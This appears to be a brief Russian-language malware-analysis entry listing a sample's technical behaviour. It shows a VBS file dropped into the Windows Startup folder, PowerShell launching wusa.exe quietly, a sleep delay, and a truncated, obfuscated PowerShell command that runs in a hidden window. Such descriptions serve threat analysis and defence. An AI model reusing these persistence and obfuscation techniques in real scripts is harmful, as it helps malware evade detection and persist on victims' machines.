Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wusa.exe RiWcG /quiet /norestart
- '<SYSTEM32>\wusa.exe' RiWcG /quiet /norestart
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "sleep 180"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 ... (со скрытым окном)